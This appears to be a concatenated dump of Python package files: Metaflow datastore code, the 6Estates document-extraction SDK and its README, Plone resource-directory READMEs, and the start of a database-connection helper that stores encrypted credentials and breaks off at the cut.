artifact_cache = {}
datastores = [ds_class(flow_name,
run_id=run_id,
step_name=step_name,
task_id=task_id,
metadata=metadata,
attempt=attempt,
event_logger=event_logger,
monitor=monitor,
data_obj=json.loads(data_blob),
artifact_cache=artifact_cache)
for step_name, task_id, attempt, data_blob in data_blobs]
if prefetch_data_artifacts:
artifacts_to_prefetch = set(
[ds.artifact_path(artifact_name)
for ds in datastores
for artifact_name in prefetch_data_artifacts
if artifact_name in ds])
# Update (and not re-assign) the artifact_cache since each datastore
# created above has a reference to this object.
artifact_cache.update(ds_class.get_artifacts(artifacts_to_prefetch))
self.pathspec_index_cache = {}
self.pathspec_cache = {}
for ds in datastores:
self.pathspec_index_cache[ds.pathspec_index] = ds
self.pathspec_cache[ds.pathspec] = ds
def get_with_pathspec(self, pathspec):
return self.pathspec_cache.get(pathspec, None)
def get_with_pathspec_index(self, pathspec_index):
return self.pathspec_index_cache.get(pathspec_index, None)
def __iter__(self):
for v in self.pathspec_cache.values():
yield v | 6D657461666C6F77 | /6D657461666C6F77-0.0.17.tar.gz/6D657461666C6F77-0.0.17/metaflow/datastore/datastore_set.py | datastore_set.py |
import gzip
import os
import sys
import time
from hashlib import sha1
from functools import partial
from collections import Sequence
try:
# Python 2
import cPickle as pickle
except:
# Python 3
import pickle
from types import MethodType, FunctionType
from ..includefile import InternalFile
from ..parameters import Parameter
from ..exception import MetaflowException, MetaflowInternalError
from ..metadata import DataArtifact
from .. import metaflow_config
class DataException(MetaflowException):
headline = "Data store error"
class Inputs(object):
"""
split-and: inputs.step_a.x inputs.step_b.x
foreach: inputs[0].x
both: (inp.x for inp in inputs)
"""
def __init__(self, flows):
# TODO sort by foreach index
self.flows = list(flows)
for flow in self.flows:
setattr(self, flow._current_step, flow)
def __getitem__(self, idx):
return self.flows[idx]
def __iter__(self):
return iter(self.flows)
def only_if_not_done(f):
def method(self, *args, **kwargs):
if self._is_done_set:
raise MetaflowInternalError("Tried to write to datastore "\
"(method %s) after it was marked "\
".done()" % f.func_name)
return f(self, *args, **kwargs)
return method
class TransformableObject(object):
# Very simple wrapper class to only keep one transform
# of an object. This is to force garbage collection
# on the transformed object if the transformation is
# successful
def __init__(self, current_object):
self._object = current_object
self._original_type = type(self._object)
def transform(self, transformer):
# Transformer is a function taking one argument (the current object) and returning another
# object which will replace the current object if transformer does not raise an
# exception
try:
temp = transformer(self._object)
self._object = temp
except: # noqa E722
raise
def current(self):
return self._object
def current_type(self):
return type(self._object)
def original_type(self):
return self._original_type
class MetaflowDataStore(object):
datastore_root = None
# Datastore needs to implement the methods below
def save_metadata(self, name, data):
"""
Save a task-specific metadata dictionary as JSON.
"""
raise NotImplementedError()
def load_metadata(self, name):
"""
Load a task-specific metadata dictionary as JSON.
"""
raise NotImplementedError()
def has_metadata(self, name):
"""
Return True if this metadata file exists.
"""
raise NotImplementedError()
def save_data(self, sha, transformable_object):
"""
Save a content-addressed data blob if it doesn't exist already.
"""
raise NotImplementedError()
def load_data(self, sha):
"""
Load a content-addressed data blob.
"""
raise NotImplementedError()
def save_log(self, logtype, bytebuffer):
"""
Save a log file represented as a bytes object.
Returns path to log file.
"""
raise NotImplementedError()
def load_log(self, logtype, attempt_override=None):
"""
Load a task-specific log file represented as a bytes object.
"""
raise NotImplementedError()
def done(self):
"""
Write a marker indicating that datastore has finished writing to
this path.
"""
raise NotImplementedError()
def is_done(self):
"""
A flag indicating whether this datastore directory was closed
succesfully with done().
"""
raise NotImplementedError()
def object_path(self, sha):
"""
Return URL of an object identified by a sha.
"""
raise NotImplementedError()
@classmethod
def get_latest_tasks(cls,
flow_name,
run_id=None,
steps=None,
pathspecs=None):
"""
Return a list of (step, task, attempt, metadata_blob) for a subset of
the tasks (consider eventual consistency) for which the latest attempt
is done for the input `flow_name, run_id`.
We filter the list based on `steps` if non-None.
Alternatively, `pathspecs` can contain the exact list of pathspec(s)
(run_id/step_name/task_id) that should be filtered.
Note: When `pathspecs` is specified, we expect strict consistency and
not eventual consistency in contrast to other modes.
"""
raise NotImplementedError()
@classmethod
def get_artifacts(cls, artifacts_to_prefetch):
"""
Return a list of (sha, obj_blob) for all the object_path(s) specified in
`artifacts_to_prefetch`.
"""
raise NotImplementedError()
def artifact_path(self, artifact_name):
"""
Return the object_path() for `artifact_name`.
Pre-condition: `artifact_name` is in datastore.
"""
if self.objects:
return self.object_path(self.objects[artifact_name])
return None
def get_log_location(self, logtype, attempt_override=None):
"""
Returns a string indicating the location of the log of the specified type.
"""
filename = self.filename_with_attempt_prefix(
'%s.log' % logtype, attempt_override if attempt_override is not None else self.attempt)
return os.path.join(self.root, filename)
@classmethod
def get_datastore_root_from_config(cls, echo, create_on_absent=True):
"""
Returns a default choice for datastore_root from metaflow_config
depending on the datastore type.
"""
return getattr(metaflow_config,
'DATASTORE_SYSROOT_%s' % cls.TYPE.upper())
@classmethod
def decode_gzip_data(cls, filename, fileobj=None):
"""
Returns the gzip data in file with `filename` or passed via `fileobj`.
"""
with gzip.GzipFile(filename, fileobj=fileobj, mode='rb') as f:
return f.read()
@classmethod
def make_path(cls,
flow_name,
run_id=None,
step_name=None,
task_id=None,
pathspec=None):
"""
Return the path for a given flow using this datastore.
path = cls.datastore_root/flow_name/run_id/step_name/task_id
Callers are expected to invoke this function with a sequence of non-None
values depending on the nested path they want.
For example,
If run_id is None, return path = cls.datastore_root/flow_name
If step_name is None, return path = cls.datastore_root/flow_name/run_id
and so on.
If pathspec is non None,
return path = cls.datastore_root/flow_name/pathspec
"""
sysroot = cls.datastore_root
if pathspec:
return os.path.join(sysroot, flow_name, pathspec)
elif flow_name is None:
return sysroot
elif run_id is None:
return os.path.join(sysroot, flow_name)
elif step_name is None:
return os.path.join(sysroot, flow_name, run_id)
elif task_id is None:
return os.path.join(sysroot, flow_name, run_id, step_name)
else:
return os.path.join(sysroot, flow_name, run_id, step_name, task_id)
@classmethod
def filename_with_attempt_prefix(cls, name, attempt):
"""
Return the equivalent filename for `name` depending
whether an attempt prefix must be used, if `attempt` isn't None.
"""
if attempt is None:
return name
else:
return '%d.%s' % (attempt, name)
@classmethod
def get_metadata_filename_for_attempt(cls, attempt):
"""
Return the metadata filename (.data.json) based on `attempt`.
"""
return cls.filename_with_attempt_prefix('data.json', attempt)
@classmethod
def is_metadata_filename(cls, fname):
"""
Returns if the filename is a metadata filename (ends in .data.json).
"""
return fname.endswith('data.json')
@classmethod
def get_done_filename_for_attempt(cls, attempt):
"""
Returns the done filename (.DONE.lock) based on `attempt`.
"""
return cls.filename_with_attempt_prefix('DONE.lock', attempt)
@classmethod
def is_done_filename(cls, fname):
"""
Returns if the filename is a done filename (ends in .DONE.lock).
"""
return fname.endswith('DONE.lock')
@classmethod
def get_filename_for_attempt(cls, attempt):
"""
Returns the attempt filename (.attempt.json) based on `attempt`.
"""
return cls.filename_with_attempt_prefix('attempt.json', attempt)
@classmethod
def is_attempt_filename(cls, fname):
"""
Returns if the filename is an attempt filename (ends in .attempt.json).
"""
return fname.endswith('attempt.json')
@classmethod
def parse_filename(cls, fname):
"""
Parse the filename and returns (name, attempt).
When using old style paths (pre-attempt id), returns
(name=fname, attempt=None).
This is expected to be the converse to
filename_with_attempt_prefix() method.
"""
if len(fname) >= 1 and fname[0] >= '0' and fname[0] <= '9':
# new style paths = <attempt>.<name>
attempt = int(fname[0])
name = fname[2:]
else:
# old style paths.
attempt = None
name = fname
return name, attempt
def __init__(self,
flow_name,
run_id=None,
step_name=None,
task_id=None,
mode='r',
metadata=None,
attempt=None,
event_logger=None,
monitor=None,
data_obj=None,
artifact_cache=None):
if run_id == 'data':
raise DataException("Run ID 'data' is reserved. "
"Try with a different --run-id.")
if self.datastore_root is None:
raise DataException("Datastore root not found. "
"Specify with DATASTORE_SYSROOT_%s "
"environment variable." % self.TYPE.upper())
self.event_logger = event_logger
self.monitor = monitor
self.metadata = metadata
self.run_id = run_id
self.step_name = step_name
self.task_id = task_id
self._is_done_set = False
self._encodings = {'gzip+pickle-v2'}
ver = sys.version_info[0] * 10 + sys.version_info[1]
if ver >= 34:
self._encodings.add('gzip+pickle-v4')
self.artifact_cache = artifact_cache
if self.artifact_cache is None:
self.artifact_cache = {}
self.data_root = os.path.join(self.datastore_root, flow_name, 'data')
self.root = self.make_path(flow_name,
run_id,
step_name,
task_id)
self.attempt = attempt
if mode == 'w':
if run_id is not None:
# run_id may be None when datastore is used to save
# things not related to runs, e.g. the job package
self.save_metadata('attempt', {'time': time.time()})
self.objects = {}
self.info = {}
elif mode == 'r':
if data_obj is None:
# what is the latest attempt ID of this data store?
# In the case of S3, the has_metadata() below makes a
# HEAD request to a non-existent object, which results
# to this object becoming eventually consistent. This
# could result to a situation that has_metadata() misses
# the latest version although it is already existing.
# As long as nothing opens a datastore for reading before
# writing, this should not be a problem.
# We have to make MAX_ATTEMPTS HEAD requests, which is
# very unfortunate performance-wise (TODO: parallelize this).
# On Meson it is possible that some attempts are missing, so
# we have to check all possible attempt files to find the
# latest one. Compared to doing a LIST operation, these checks
# are guaranteed to be consistent as long as the task to be
# looked up has already finished.
self.attempt = None # backwards-compatibility for pre-attempts.
for i in range(0, metaflow_config.MAX_ATTEMPTS):
if self.has_metadata('%d.attempt' % i, with_attempt=False):
self.attempt = i
# was the latest attempt completed successfully?
if not self.is_done():
raise DataException("Data was not found or not finished at %s"\
% self.root)
# load the data from the latest attempt
data_obj = self.load_metadata('data')
self.origin = data_obj.get('origin')
self.objects = data_obj['objects']
self.info = data_obj.get('info', {})
elif mode == 'd':
# Direct access mode used by the client. We effectively don't load any
# objects and can only access things using the load_* functions
self.origin = None
self.objects = None
self.info = None
else:
raise DataException('Unknown datastore mode: %s' % mode)
@property
def pathspec(self):
return '%s/%s/%s' % (self.run_id, self.step_name, self.task_id)
@property
def pathspec_index(self):
idxstr = ','.join(map(str, (f.index for f in self['_foreach_stack'])))
return '%s/%s[%s]' % (self.run_id, self.step_name, idxstr)
def _save_object(self, transformable_obj, var, force_v4=False):
if force_v4:
blobtype = 'gzip+pickle-v4'
if blobtype not in self._encodings:
raise DataException("Artifact *%s* requires a serialization encoding that "
"requires Python 3.4 or newer." % var)
transformable_obj.transform(lambda x: pickle.dumps(x, protocol=4))
else:
try:
# to ensure compatibility between python2 and python3, we use the
# highest protocol that works with both the versions
transformable_obj.transform(lambda x: pickle.dumps(x, protocol=2))
blobtype = 'gzip+pickle-v2'
except (SystemError, OverflowError):
# this happens when you try to serialize an oversized
# object (2GB/4GB+)
blobtype = 'gzip+pickle-v4'
if blobtype not in self._encodings:
raise DataException("Artifact *%s* is very large (over 2GB). "
"You need to use Python 3.4 or newer if "
"you want to serialize large objects."
% var)
transformable_obj.transform(lambda x: pickle.dumps(x, protocol=4))
sha = sha1(transformable_obj.current()).hexdigest()
sz = len(transformable_obj.current())
self.save_data(sha, transformable_obj)
return sha, sz, blobtype
def _load_object(self, sha):
if sha in self.artifact_cache:
blob = self.artifact_cache[sha]
else:
blob = self.load_data(sha)
return pickle.loads(blob)
@only_if_not_done
def clone(self, origin):
self.save_metadata('data', {'datastore': self.TYPE,
'version': '0.1',
'origin': origin.pathspec,
'python_version': sys.version,
'objects': origin.objects,
'info': origin.info})
self._register_data_artifacts(origin.objects, origin.info)
@only_if_not_done
def passdown_partial(self, origin, vars):
# Pass-down from datastore origin all information related to vars to
# this datastore. In other words, this adds to the current datastore all
# the variables in vars (obviously, it does not download them or anything but
# records information about them). This is used to propagate parameters between
# datastores without actually loading the parameters
for var in vars:
sha = origin.objects.get(var)
if sha:
self.objects[var] = sha
self.info[var] = origin.info[var]
@only_if_not_done
def persist(self, flow):
def serializable_attributes():
for var in dir(flow):
if var.startswith('__') or var in flow._EPHEMERAL:
continue
# Skip over properties of the class (Parameters)
if hasattr(flow.__class__, var) and \
isinstance(getattr(flow.__class__, var), property):
continue
val = getattr(flow, var)
if isinstance(val, InternalFile):
# We will force protocol 4 for serialization for anything
# bigger than 1 GB
yield var, TransformableObject(val()), val.size() > 1024 * 1024 * 1024
continue
if not (isinstance(val, MethodType) or
isinstance(val, FunctionType) or
isinstance(val, Parameter)):
yield var, TransformableObject(val), False
# initialize with old values...
if flow._datastore:
self.objects.update(flow._datastore.objects)
self.info.update(flow._datastore.info)
# ...overwrite with new
for var, obj, force_v4 in serializable_attributes():
sha, size, encoding = self._save_object(obj, var, force_v4)
self.objects[var] = sha
self.info[var] = {'size': size,
'type': str(obj.original_type()),
'encoding': encoding}
self.save_metadata('data', {'datastore': self.TYPE,
'version': '1.0',
'attempt': self.attempt,
'python_version': sys.version,
'objects': self.objects,
'info': self.info})
self._register_data_artifacts(self.objects, self.info)
def _register_data_artifacts(self, objects, info):
# register artifacts with the metadata service
artifacts = [DataArtifact(name=var,
ds_type=self.TYPE,
url=self.object_path(sha),
sha=sha,
type=info[var]['encoding'])
for var, sha in objects.items()]
self.metadata.register_data_artifacts(self.run_id,
self.step_name,
self.task_id,
self.attempt,
artifacts)
def get(self, var, default=None):
if self.objects:
return self[var] if var in self.objects else default
return default
# Provides a fast-path to check if a given object is None.
def is_none(self, var):
if not self.info:
return True
info = self.info.get(var)
if info:
obj_type = info.get('type')
# Conservatively check if the actual object is None, in case
# the artifact is stored using a different python version.
if obj_type == str(type(None)):
return True
# Slow path since this has to get the object from S3.
return self.get(var) is None
def __contains__(self, var):
if self.objects:
return var in self.objects
return False
def __getitem__(self, var):
# backwards compatibility: we might not have info for all objects
if not self.info:
return None
info = self.info.get(var)
if info:
encoding = info.get('encoding', 'gzip+pickle-v2')
else:
encoding = 'gzip+pickle-v2'
if encoding in self._encodings:
return self._load_object(self.objects[var])
raise DataException("Artifact *%s* requires a newer version "
"of Python. Try with Python 3.4 or newer." %
var)
def __iter__(self):
if self.objects:
return iter(self.objects)
return iter([])
def __str__(self):
return self.format(show_private=True, max_value_size=1000)
def items(self):
if self.objects:
return self.objects.items()
return {}
def to_dict(self, show_private=False, max_value_size=None, include=None):
d = {}
for k, v in self.items():
if include and k not in include:
continue
if k[0] == '_' and not show_private:
continue
if max_value_size is not None and\
self.info[k]['size'] > max_value_size:
d[k] = ArtifactTooLarge()
else:
d[k] = self[k]
return d
def format(self, **kwargs):
def lines():
for k, v in self.to_dict(**kwargs).items():
yield k, '*{key}* [size: {size} type: {type}] = {value}'\
.format(key=k, value=v, **self.info[k])
return '\n'.join(line for k, line in sorted(lines()))
class ArtifactTooLarge(object):
def __str__(self):
return '< artifact too large >' | 6D657461666C6F77 | /6D657461666C6F77-0.0.17.tar.gz/6D657461666C6F77-0.0.17/metaflow/datastore/datastore.py | datastore.py |
from .s3util import aws_retry, get_s3_client
try:
# python2
from urlparse import urlparse
import cStringIO
BytesIO = cStringIO.StringIO
except:
# python3
from urllib.parse import urlparse
import io
BytesIO = io.BytesIO
class S3Tail(object):
def __init__(self, s3url):
url = urlparse(s3url)
self.s3, self.ClientError = get_s3_client()
self._bucket = url.netloc
self._key = url.path.lstrip('/')
self._pos = 0
self._tail = b''
@property
def bytes_read(self):
return self._pos
@property
def tail(self):
return self._tail
def __iter__(self):
while True:
buf = self._fill_buf()
if buf is None:
yield b''
else:
for line in buf:
if line.endswith(b'\n'):
yield line
else:
self._tail = line
break
@aws_retry
def _make_range_request(self):
try:
return self.s3.get_object(Bucket=self._bucket,
Key=self._key,
Range='bytes=%d-' % self._pos)
except self.ClientError as err:
code = err.response['Error']['Code']
# NOTE we deliberately regard NoSuchKey as an ignorable error.
# We assume that the file just hasn't appeared in S3 yet.
if code in ('InvalidRange', 'NoSuchKey'):
return None
else:
raise
def _fill_buf(self):
resp = self._make_range_request()
if resp is None:
return None
code = str(resp['ResponseMetadata']['HTTPStatusCode'])
if code[0] == '2':
data = resp['Body'].read()
if data:
buf = BytesIO(self._tail + data)
self._pos += len(data)
self._tail = b''
return buf
else:
return None
elif code[0] == '5':
return None
else:
raise Exception('Retrieving %s/%s failed: %s' % (self.bucket, self.key, code)) | 6D657461666C6F77 | /6D657461666C6F77-0.0.17.tar.gz/6D657461666C6F77-0.0.17/metaflow/datastore/util/s3tail.py | s3tail.py |
6Estates idp-python
==============
A Python SDK for communicating with the 6Estates Intelligent Document Processing(IDP) Platform.
Documentation
-----------------
The documentation for the 6Estates IDP API can be found via https://idp-sea.6estates.com/docs
The Python library documentation can be found via https://idp-sdk-doc.6estates.com/python/.
Setup
-----------------
.. code-block:: bash
$ pip install 6estates-idp
Usage
============
1. Initialize the 6Estates IDP Client
---------------------------------------------------------------------
6E API Access Token(Deprecated)
.. code-block:: python
from sixe_idp.api import Client, FileType
client = Client(region='sea', token='your-token-here')
6E API Authorization based on oauth 2.0
.. code-block:: python
from sixe_idp.api import Client, OauthClient, FileType
oauth = OauthClient(region='sea').get_IDP_authorization(authorization ='your-authorization-here')
client = Client(region='sea', token=oauth, isOauth=True)
2. To Extract Fields in Synchronous Way
---------------------------------------------------------------------
If you just need to do one file at a time
.. code-block:: python
from sixe_idp.api import Client, FileType
client = Client(region='sea', token='your-token-here')
task_result = client.extraction_task.run_simple_task(file=open("[UOB]202103_UOB_2222.pdf","rb"), file_type=FileType.bank_statement)
3. To Extract Fields in Asynchronous Way
--------------------------------------------------------------------
If you need to do a batch of files
.. code-block:: python
from sixe_idp.api import Client, Task, TaskResult, IDPException, FileType
client: Client = Client(region='test', token='your-token-here')
task: Task = client.extraction_task.create(file=open("path-to-the-file"), file_type=FileType.bank_statement)
task_result: TaskResult = client.extraction_task.result(task_id=task.task_id)
while task_result.status == 'Doing' or task_result.status=='Init':
time.sleep(3)
task_result = client.extraction_task.result(task_id=task.task_id)
print(task_result.raw)
| 6estates-idp | /6estates-idp-0.1.4.tar.gz/6estates-idp-0.1.4/README.rst | README.rst |
import time
import requests
from enum import Enum
class FileType(Enum):
bank_statement = 'CBKS'
invoice = 'CINV'
cheque = 'CHQ'
credit_bureau_singapore = 'CBS'
receipt = 'RCPT'
payslip = 'PS'
packing_list = 'PL'
bill_of_lading = 'BL'
air_waybill = 'AWBL'
kartu_tanda_penduduk = 'KTP'
hong_kong_annual_return = 'HKAR'
purchase_order = 'PO'
delivery_order = 'DO'
class IDPException(Exception):
"""
An IDP processing error occurred.
"""
pass
class IDPConfigurationException(Exception):
"""
An IDP configuration error occurred.
"""
pass
class Task(object):
"""
The :class:`Task <Task>` object, which contains a server's response to an IDP task creating request.
"""
def __init__(self, raw=None):
self.raw = raw
@property
def task_id(self):
return self.raw['data']
class TaskResultField:
def __init__(self, raw) -> None:
self.raw = raw
@property
def field_code(self):
"""
see `field_code <https://idp-sea.6estates.com/docs#/types/type_desc>`_
"""
return self.raw['field_code']
@property
def field_name(self):
"""
see `field_name <https://idp-sea.6estates.com/docs#/types/type_desc>`_
"""
return self.raw['field_name']
@property
def value(self):
return self.raw['value']
@property
def type(self):
"""
see `type <https://idp-sea.6estates.com/docs#/format/format>`_
"""
return self.raw['type']
# @property
# def extraction_confidence(self):
# return self.raw['extraction_confidence']
class TaskResult(object):
def __init__(self, raw):
self.raw = raw
@property
def status(self):
"""
status of the task, which can be:
- **Init** Task is created
- **Doing** Task is being processed
- **Done** Task result is avaiable
- **Fail** An error occurred
- **Invalid** Invalid document
read `more <https://idp-sea.6estates.com/docs#/extract/extraction?id=_2135-response>`_
"""
return self.raw['data']['taskStatus']
@property
def fields(self):
"""
List of :class:`TaskResultField <TaskResultField>` object
"""
return [TaskResultField(x) for x in self.raw['data']['fields']]
class ExtractionTaskClient(object):
def __init__(self, token=None, region=None, isOauth=False):
"""
Initializes task extraction
:param str token: Client's token
:param str region: Region to make requests to, defaults to 'sea'
:param bool isOauth: Oauth 2.0 flag
"""
self.token = token
self.region = region
self.isOauth = isOauth
# URL to upload file and get response
if region == 'test':
region = ''
else:
region = '-'+region
self.url_post = "https://idp"+region + \
".6estates.com/customer/extraction/fields/async"
self.url_get = "https://idp"+region + \
".6estates.com/customer/extraction/field/async/result/"
def create(self, file=None, file_type=None, lang=None,
customer=None, customer_param=None, callback=None,
auto_callback=None, callback_mode=None, hitl=None) -> Task:
"""
:param lang: English: EN, Default is EN
:type lang: str
:param file: Pdf/image file. Only one file is allowed to be uploaded each time
:type file: file
:param file_type: The code of the file type (e.g., CBKS). Please see details of File Type Code.
:type file_type: FileType
:param customer: Enterprise/customer code (e.g., ABCD). a fixed value provided by 6E.
:type customer: str
:param customer_param: Any value in string specified by customer enterprise/customer. This value will return in callback request.
:type customer_param: str
:param callback: A http(s) link for callback after completing the task. If you need to use the callback parameter, please make sure that the callback url does not have any authentication.
:type callback: str
:param auto_callback: Callback request will request automatic if autoCallback is true, otherwise, the user needs to manually trigger the callback.Default value is true.
:type auto_callback: bool
:param callback_mode: Callback mode when the task finishes.
- `mode 0`: callback request only contains the task status.
- `mode 1`: callback request contains task status and extracted field results.
- `mode 2`: callback request contains task status, extracted fields results and pdf file.
Default is 0.
:type callback_mode: int
:param hitl: Enables the Human-In-The-Loop (HITL) service. If the value is true, the submitted task will be processed by AI + HITL. Otherwise, the task will be processed by AI only.
Default value: false.
:type hitl: bool
"""
assert isinstance(file_type, FileType), "Invalid file type"
if file is None:
raise IDPException("File is required")
if self.isOauth:
headers = {"Authorization": self.token}
else:
headers = {"X-ACCESS-TOKEN": self.token}
files = {"file": file}
data = {'fileType': file_type.value, 'lang': lang, 'customer': customer,
'customerParam': customer_param, 'callback': callback,
'autoCallback': auto_callback, 'callbackMode': callback_mode,
'hitl': hitl}
trash_bin = []
for key in data:
if data[key] is None:
trash_bin.append(key)
for key in trash_bin:
del data[key]
r = requests.post(self.url_post, headers=headers,
files=files, data=data)
if r.ok:
return Task(r.json())
raise IDPException(r.json()['message'])
def result(self, task_id=None) -> TaskResult:
"""
:param task_id: task_id
:type task_id: int
:returns: status and result of task
:rtype: :class:`TaskResult <TaskResult>`
"""
if self.isOauth:
headers = {"Authorization": self.token}
else:
headers = {"X-ACCESS-TOKEN": self.token}
r = requests.get(self.url_get+str(task_id), headers=headers)
if r.ok:
return TaskResult(r.json())
raise IDPException(r.json()['message'])
def run_simple_task(self, file=None, file_type=None, poll_interval=3, timeout=600):
"""
Run simple extraction task
:param file: Pdf/image file. Only one file is allowed to be uploaded each time
:type file: file
:param file_type: The code of the file type (e.g., CBKS). Please see details of File Type Code.
:type file_type: FileType
:param poll_interval: Interval to poll the result from api, in seconds
:type poll_interval: float
:param timeout: Timeout in seconds
:type timeout: float
"""
start = time.time()
task = self.create(file=file, file_type=file_type)
task_result = self.result(task_id=task.task_id)
while(task_result.status=='Doing' or task_result.status=='Init'):
if time.time() - start > timeout:
raise IDPException(f'Task timeout exceeded: {timeout}')
time.sleep(poll_interval)
task_result = self.result(task_id=task.task_id)
if task_result.status == 'Done':
return task_result
return task_result
class OauthClient(object):
def __init__(self, region=None):
"""
Initializes the Oauth Client
:param region: IDP Region to make requests to, e.g. 'test'
:type region: str
:returns: :class:`OauthClient <OauthClient>`
:rtype: sixe_idp.api.OauthClient
"""
if region not in ['test', 'sea']:
raise IDPConfigurationException(
"Region is required and limited in ['test','sea']")
self.region = region
if region == 'test':
region = '-onp'
else:
region = '-'+region
self.url_post = "https://oauth"+region + \
".6estates.com/oauth/token?grant_type=client_bind"
def get_IDP_authorization(self, authorization=None):
"""
:param authorization: Client's authorization
:type authorization: str
"""
if authorization is None:
raise IDPConfigurationException('Authorization is required')
self.authorization = authorization
headers = {"Authorization": self.authorization}
r = requests.post(self.url_post, headers=headers)
if r.ok:
if r.json()['data']['expired'] == False:
return r.json()['data']['value']
else:
raise IDPException("This IDP Authorization is expired, please re-send the request to get new IDP Authorization. " + r.json()['message'])
raise IDPException(r.json()['message'])
class Client(object):
def __init__(self, region=None, token=None, isOauth=False):
"""
Initializes the IDP Client
:param token: Client's token
:type token: str
:param region: IDP Region to make requests to, e.g. 'test'
:param bool isOauth: Oauth 2.0 flag
:type token: str
:returns: :class:`Client <Client>`
:rtype: sixe_idp.api.Client
"""
if token is None:
raise IDPConfigurationException('Token is required')
if region not in ['test', 'sea']:
raise IDPConfigurationException(
"Region is required and limited in ['test','sea']")
self.region = region
self.token = token
self.isOauth = isOauth
self.extraction_task = ExtractionTaskClient(token=token, region=region, isOauth=self.isOauth)
"""
An :class:`ExtractionTaskClient <ExtractionTaskClient>` object
""" | 6estates-idp | /6estates-idp-0.1.4.tar.gz/6estates-idp-0.1.4/sixe_idp/api.py | api.py |
README for the 'browser/images/' directory
==========================================
This folder is a Zope 3 Resource Directory acting as a repository for images.
Its declaration is located in 'browser/configure.zcml':
<!-- Resource directory for images -->
<browser:resourceDirectory
name="73.unlockItems.images"
directory="images"
layer=".interfaces.IThemeSpecific"
/>
An image placed in this directory (e.g. 'logo.png') can be accessed from
this relative URL:
"++resource++73.unlockItems.images/logo.png"
Note that it might be better to register each of these resources separately if
you want them to be overridable from zcml directives.
The only way to override a resource in a resource directory is to override the
entire directory (all elements have to be copied over).
A Zope 3 browser resource declared like this in 'browser/configure.zcml':
<browser:resource
name="logo.png"
file="images/logo.png"
layer=".interfaces.IThemeSpecific"
/>
can be accessed from this relative URL:
"++resource++logo.png"
Notes
-----
* Whatever the way they are declared (in bulk inside a resource directory or
as separate resources), images registered as Zope 3 browser resources don't
have all the attributes that Zope 2 image objects have (i.e. the 'title'
property and the 'tag()' and 'get_size()' methods).
This means that if you want the html tag of your image to be auto-generated
(this is the case by default for the portal logo), you should store it in a
directory that is located in the 'skins/' folder of your package, registered
as a File System Directory View in the 'portal_skins' tool, and added to the
layers of your skin.
* Customizing/overriding images that are originally accessed from the
'portal_skins' tool (e.g. Plone default logo and icons) can be done inside
that tool only. There is no known way to do it with Zope 3 browser
resources.
Vice versa, there is no known (easy) way to override a Zope 3 browser
resource from a skin layer in 'portal_skins'.
| 73.unlockItems | /73.unlockItems-0.3.tar.gz/73.unlockItems-0.3/73/unlockItems/browser/images/README.txt | README.txt |
README for the 'browser/stylesheets/' directory
===============================================
This folder is a Zope 3 Resource Directory acting as a repository for
stylesheets.
Its declaration is located in 'browser/configure.zcml':
<!-- Resource directory for stylesheets -->
<browser:resourceDirectory
name="73.unlockItems.stylesheets"
directory="stylesheets"
layer=".interfaces.IThemeSpecific"
/>
A stylesheet placed in this directory (e.g. 'main.css') can be accessed from
this relative URL:
"++resource++73.unlockItems.stylesheets/main.css"
Note that it might be better to register each of these resources separately if
you want them to be overridable from zcml directives.
The only way to override a resource in a resource directory is to override the
entire directory (all elements have to be copied over).
A Zope 3 browser resource declared like this in 'browser/configure.zcml':
<browser:resource
name="main.css"
file="stylesheets/main.css"
layer=".interfaces.IThemeSpecific"
/>
can be accessed from this relative URL:
"++resource++main.css"
Notes
-----
* Stylesheets registered as Zope 3 resources might be flagged as not found in
the 'portal_css' tool if the layer they are registered for doesn't match the
default skin set in 'portal_skins'.
This can be confusing but it must be considered as a minor bug in the CSS
registry instead of a lack in the way Zope 3 resources are handled in
Zope 2.
* There might be a way to interpret DTML from a Zope 3 resource view.
Although, if you need to use DTML for setting values in a stylesheet (the
same way as in default Plone stylesheets where values are read from
'base_properties'), it is much easier to store it in a directory that is
located in the 'skins/' folder of your package, registered as a File System
Directory View in the 'portal_skins' tool, and added to the layers of your
skin.
* Customizing/overriding stylesheets that are originally accessed from the
'portal_skins' tool (e.g. Plone default stylesheets) can be done inside that
tool only. There is no known way to do it with Zope 3 browser resources.
Vice versa, there is no known way to override a Zope 3 browser resource from
a skin layer in 'portal_skins'.
| 73.unlockItems | /73.unlockItems-0.3.tar.gz/73.unlockItems-0.3/73/unlockItems/browser/stylesheets/README.txt | README.txt |
This directory will be the home for internationalizations for your theme
package. For more information on internationalization please consult the
following sources:
http://plone.org/documentation/kb/product-skin-localization
http://plone.org/documentation/kb/i18n-for-developers
http://www.mattdorn.com/content/plone-i18n-a-brief-tutorial/
http://grok.zope.org/documentation/how-to/how-to-internationalize-your-application
http://maurits.vanrees.org/weblog/archive/2007/09/i18n-locales-and-plone-3.0
http://n2.nabble.com/Recipe-for-overriding-translations-td3045492ef221724.html
http://dev.plone.org/plone/wiki/TranslationGuidelines
| 73.unlockItems | /73.unlockItems-0.3.tar.gz/73.unlockItems-0.3/73/unlockItems/locales/README.txt | README.txt |
import pandas as pd
import datetime
from cryptography.fernet import Fernet
import pymysql
import random
import math
# Universal fn to establish a connection to the database (SQL)
def db_connection(cypher_key,database="main"):
key = bytes(cypher_key,'utf-8')
cipher_suite = Fernet(key)
if database=="main":
host_enc = b'gAAAAABgU5NFdPLwUewW-ljzzPKpURLo9mMKzOkClVvpWYotYRT6DsmgNlHYUKP8X3m_c12kAUqSrLw4KTlujTPly2F-R-CFrw=='
user_enc = b'gAAAAABf-DB2YcOMC7JvsL-GihLJcImh6DvJpt1hNZFetiCzxMacK4agYHkyl3W1mnRkHNmEnecp4mMPZRfqO6bsLP1qgrpWbA=='
pass_enc = b'gAAAAABf-DCFqT2kj-ExcdPn2IW0m0-M_3piK2-w1xNpUvH21XDsz3iqixvrT-NxKnpf1wirp0NcYoQEGt4TKpYHJzXcrXy6TA=='
database_enc = b'gAAAAABfQPr48Sej-V7GarivuF4bsfBgP9rldzD500gl174HK4LZy70VfEob-kbaOBFa8rhuio_PbCFj4Nt3nJzVjKqC83d1NA=='
elif database=="vista":
host_enc = b'gAAAAABfQPr4eF5i5aU4vfC4RieOdLr9GjwQPWWmvTWT728cK-qUoPesPZmLKwE4vTkhh3oxCmREfrHN1omRwmxJJuo_CS4cMmRKG8_mLFIBQG1mg2Kx102PixJAdf1l74dhO6VI8ZCR'
user_enc = b'gAAAAABfQPr4PssChqSwFRHAGwKGCrKRLvnjRqfBkrazUydFvX3RBNAr5zAvKxdGJtaemdjq3uRwk1kgY4tLpIO9CxXj_JdC0w=='
